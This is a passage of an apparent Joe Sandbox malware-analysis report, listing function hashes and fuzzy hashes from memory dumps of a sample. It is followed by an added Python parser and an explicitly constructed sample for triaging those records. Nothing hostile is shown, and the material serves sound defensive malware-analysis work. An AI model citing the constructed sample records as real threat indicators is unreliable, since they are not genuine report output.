                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cb2116e0c25f2dcc7835ed67809bf126fa61c95fb1bd428afe5d640227ed59bc
                                                                        • Instruction ID: b7e221c9eb5a973ba4b2a71706045aa12f7ab57c8c4a58a9720a32f83b95056c
                                                                        • Opcode Fuzzy Hash: cb2116e0c25f2dcc7835ed67809bf126fa61c95fb1bd428afe5d640227ed59bc
                                                                        • Instruction Fuzzy Hash: 9231FCE7A1E2D64FE703463898B90D63F60DE9727530A14F7C9C0CB163EA1C880B9761
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fb722940f45ff6648e3adba4b7cae228cb2948b833247ea8742b7c2aaa71f89
                                                                        • Instruction ID: dfb1968f364e42c0972c5c8e04a59e16cf2958dd76e3bbb85b2d0a4e3865ca0b
                                                                        • Opcode Fuzzy Hash: 9fb722940f45ff6648e3adba4b7cae228cb2948b833247ea8742b7c2aaa71f89
                                                                        • Instruction Fuzzy Hash: E93163A7E1E286CFD3539E7CD8A80D63BA0EF4621570501F7C5818B093DE28A416D7E5
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 684a68df941dd6ce6fae9374159fe09f8956774a2393b8e9856fb1c57c79dfe4
                                                                        • Instruction ID: bd306a0b195866e8e64d8edecc4d92170889d26dd08ed08c658ca664094fea53
                                                                        • Opcode Fuzzy Hash: 684a68df941dd6ce6fae9374159fe09f8956774a2393b8e9856fb1c57c79dfe4
                                                                        • Instruction Fuzzy Hash: 33216067E1E285CFD3539A7CD8A80D63BA0AF8721570501F7C5D18B093DA28A41AD7E5
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%
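The function records above are only useful for triage once they are pulled out of the report layout: which memory dump each function came from, which functions reference a string (the usual first pivot when hunting a RAT's config decryptor), and whether the Opcode ID and Opcode Fuzzy Hash really agree in every record, as they appear to here. The parser below is an added example, not Joe Sandbox code; it reads the bulleted "Key: value" layout exactly as printed in this report (record boundaries at "Memory Dump Source", an empty value kept as an empty string). The embedded sample is a constructed two-record excerpt in that layout, and the helper names (parse_records, group_by_dump, string_referencing, opcode_id_mismatches, uniqueness_scores) are this example's own.

```python
"""Parse Joe Sandbox 'Memory Dump Source' / 'Similarity' / 'Uniqueness'
function records into dicts so fuzzy hashes can be pivoted on across reports.
Added example, not Joe Sandbox code; layout taken from the report text."""
import re
from collections import defaultdict

# Constructed sample: two records in the layout the report prints.
SAMPLE = """
Memory Dump Source
• Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8caf8282b926bac4bc6e0f4c860f0efebb5413462da7a2737eccf1e2598beacb
• Instruction ID: 5fb965459319dd251400ec3a56813a7ef9af33492bf593ba912d0b9dd58cdb7c
• Opcode Fuzzy Hash: 8caf8282b926bac4bc6e0f4c860f0efebb5413462da7a2737eccf1e2598beacb
• Instruction Fuzzy Hash: B9F08295B265190AEB07B77DC41A7FA7286EF88741FA04877E85EC35C7CC68E8060691
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
Similarity
• API ID:
• String ID: 5__^
• API String ID: 0-815891306
• Opcode ID: d78912437b5a47541f53878d7493c49e2464a2ee5fa18948c0f1d4be3e9f37d7
• Instruction ID: 83a45f57a1a7984aa515da9b49b5cf5e5f2a188dd76365586144dbca23d3e5a4
• Opcode Fuzzy Hash: d78912437b5a47541f53878d7493c49e2464a2ee5fa18948c0f1d4be3e9f37d7
• Instruction Fuzzy Hash: 7541F9E7E5D2698FD702EB7CA8E51D23BA0EF0232870501B7C5C5CE163FA046C5AC6A5
Uniqueness
Uniqueness Score: -1.00%
"""

# Optional bullet, a key of letters/spaces, a colon, then the (possibly empty) value.
FIELD_RE = re.compile(r"^(?:•\s*)?([A-Za-z ]+?):\s*(.*?)\s*$")


def parse_records(text):
    """Split on the 'Memory Dump Source' heading and collect each record's
    'Key: value' lines. Headings without a colon ('Similarity', 'Strings')
    are skipped; an empty value such as 'API ID:' is kept as ''."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Source File":
            # 'Source File: X.sdmp, Offset: <hex>, based on PE: false'
            parts = [p.strip() for p in value.split(",")]
            current["Source File"] = parts[0]
            for part in parts[1:]:
                k, _, v = part.partition(":")
                current[k.strip()] = v.strip()
        else:
            current[key] = value
    return records


def group_by_dump(records):
    """Number of functions per memory dump, keyed by (source file, offset)."""
    counts = defaultdict(int)
    for r in records:
        counts[(r.get("Source File"), r.get("Offset"))] += 1
    return dict(counts)


def string_referencing(records):
    """Records with a non-empty 'String ID': functions that touch a string."""
    return [r for r in records if r.get("String ID")]


def opcode_id_mismatches(records):
    """Records whose 'Opcode ID' differs from 'Opcode Fuzzy Hash'; empty if the
    two columns are redundant, as they are in every record on this page."""
    return [r for r in records if r.get("Opcode ID") != r.get("Opcode Fuzzy Hash")]


def uniqueness_scores(records):
    """'Uniqueness Score: -1.00%' parsed to a float (percent sign dropped)."""
    return [float(r["Uniqueness Score"].rstrip("%")) for r in records
            if "Uniqueness Score" in r]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for (src, off), n in group_by_dump(recs).items():
        print(f"{n} function(s) in {src} @ {off}")
    for r in string_referencing(recs):
        print("string ref:", r["String ID"], "in", r["Snapshot File"])
```

Run against the full report text instead of SAMPLE to get per-dump function counts and the handful of string-referencing functions worth opening first in the .jbxd snapshot; the Offset and Snapshot File name in each record identify which dump to load.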